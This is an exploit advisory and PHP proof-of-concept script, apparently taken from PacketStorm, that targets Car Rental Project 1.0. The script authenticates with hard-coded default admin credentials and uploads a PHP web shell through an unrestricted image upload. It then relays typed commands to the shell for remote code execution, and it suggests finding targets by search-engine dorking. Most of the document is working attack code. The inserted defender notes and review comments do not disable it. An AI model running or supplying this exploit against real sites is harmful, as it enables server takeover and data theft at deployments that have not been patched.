## https://sploitus.com/exploit?id=PACKETSTORM:181761
=============================================================================================================================================
| # Title : Car Rental Project 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://phpgurukul.com/car-rental-project-php-mysql-free-download/ |
=============================================================================================================================================
poc :
[+] Dorking in Google or other search engine.
[+] This PHP code is designed to create a file and inject PHP code.
[+] save payload as poc.php
[+] usage : C:\www\test>php poc.php 127.0.0.1
[+] payload :
<?php
// Print the PoC banner (tool name and author credit) before any request is made.
// The output is the same five-line block: a leading blank line, a rule, the two
// text lines, a rule, and a trailing newline.
echo "\n" . implode("\n", [
    '+-------------------------------------------------------------+',
    'Car Rental Project v1.0 - php Code injection',
    'by indoushka',
    '+-------------------------------------------------------------+',
]) . "\n";
/**
 * Proof-of-concept driver for the advisory above. It performs three steps on
 * one shared cURL handle: POST the admin login form, POST a multipart upload
 * to changeimage1.php, then relay commands typed on STDIN to the URL of the
 * uploaded file and print each response.
 *
 * What the requests below assume about the target:
 *  - the admin login accepts the hard-coded credentials sent in $post_data;
 *  - changeimage1.php stores an 'img1' upload under its submitted .php name;
 *  - files in admin/img/vehicleimages/ are web-reachable and run as PHP.
 *
 * Defender notes (mitigation and detection for the behaviour exercised here):
 *  - replace the default admin credentials on any deployment;
 *  - have the upload handler enforce a server-side allow-list of image
 *    extensions and verify the content is an image, and rename stored files;
 *  - keep uploads outside the web root, or disable script execution for the
 *    upload directory in the web server configuration;
 *  - in access logs, look for a POST to admin/changeimage1.php followed by
 *    GET requests for a .php file under admin/img/vehicleimages/ carrying a
 *    cmd query parameter, and check that directory for unexpected .php files
 *    (this PoC uses the name 1dccadfed7bcbb036c56a4afb97e906f.php).
 *
 * @param string $rhosts Target host, concatenated unvalidated into http:// URLs.
 * @return void Never returns normally: it exits on a failed step, otherwise it
 *              stays in the command loop until the process is terminated.
 */
function login($rhosts) {
// One handle is reused for every request, so options set here persist below.
$session = curl_init();
$bigstring = "\n+-------------------------------------------------------------+\n";
echo "+-------------------------------------------------------------+\n";
echo "[+] Victim host: " . $rhosts . "\n";
// Both endpoints are plain HTTP under a fixed /carrentalproject/carrental/admin/ path.
$post_auth_login = "http://" . $rhosts . "/carrentalproject/carrental/admin/index.php";
$shell_upload_url = "http://" . $rhosts . "/carrentalproject/carrental/admin/changeimage1.php";
// Login form fields; the credentials are hard-coded (presumably the
// application's shipped defaults — confirm against the vendor package).
$post_data = [
'username' => 'admin',
'password' => 'Test@12345',
'login' => ''
];
// Configure and send the login POST (form-encoded body, response captured as a string).
curl_setopt($session, CURLOPT_URL, $post_auth_login);
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
curl_setopt($session, CURLOPT_POST, true);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($session, CURLOPT_COOKIEFILE, "cookie.txt"); // turns on cookie handling for this handle; CURLOPT_COOKIEFILE reads cookies, it does not write cookie.txt
$login_response = curl_exec($session);
// Get the HTTP response code of the login request.
$http_code = curl_getinfo($session, CURLINFO_HTTP_CODE);
// NOTE(review): a 200 status only shows that a page was served; the body in
// $login_response is never inspected, so "Successfully logged in" is not
// evidence that the credentials were accepted.
if ($http_code == 200) {
echo "[+] Login HTTP response code: 200\n";
echo "[+] Successfully logged in\n";
} else {
echo "[!] Failed to authenticate\n";
exit;
}
// Proxy settings (optional, for Burp).
// NOTE(review): $proxies is defined but never applied to the cURL handle in
// this function, so requests are not routed through 127.0.0.1:8080.
$proxies = [
"http" => "http://127.0.0.1:8080",
"https" => "http://127.0.0.1:8080"
];
// Multipart file part for the 'img1' field. The .php name and the
// application/x-php type are exactly what a server-side upload filter
// would be expected to reject.
$backdoor_file = new CURLFile('1dccadfed7bcbb036c56a4afb97e906f.php', 'application/x-php', '<?php system($_GET["cmd"]); ?>');
$upload_data = [
'img1' => $backdoor_file,
'update' => ''
];
// Send the upload; passing an array to CURLOPT_POSTFIELDS makes the body multipart/form-data.
curl_setopt($session, CURLOPT_URL, $shell_upload_url);
curl_setopt($session, CURLOPT_POST, true);
curl_setopt($session, CURLOPT_POSTFIELDS, $upload_data);
$upload_response = curl_exec($session);
// NOTE(review): this only tests that the response body is truthy; neither the
// status code nor the presence of the stored file is checked, so the message
// below does not confirm that anything was written on the server.
if ($upload_response) {
echo "[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" . $bigstring;
} else {
echo "[!] Failed to upload backdoor\n";
exit;
}
// Command loop: has no exit condition, so it runs until the process is killed.
while (true) {
echo "Command RCE >> ";
$command = trim(fgets(STDIN));
// Each iteration requests the uploaded file with the URL-encoded input in the
// cmd query parameter — the request pattern visible in the target's access log.
$shell_location = "http://" . $rhosts . "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php?cmd=" . urlencode($command);
// Point the shared handle at that URL and fetch the response body.
// NOTE(review): CURLOPT_POST and CURLOPT_POSTFIELDS set for the upload are
// not reset here — confirm the request method actually sent.
curl_setopt($session, CURLOPT_URL, $shell_location);
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($session);
echo $response . "\n";
}
// Unreachable: the loop above never terminates, so the handle is never closed here.
curl_close($session);
}
// Entry point. The script expects one positional argument, the target host.
// The value is passed to login() as-is and is concatenated into URLs there
// without any validation.
if ($argc >= 2) {
    // First CLI argument is used as the host.
    login($argv[1]);
} else {
    echo "Usage: php script.php [target_host]\n";
    exit;
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================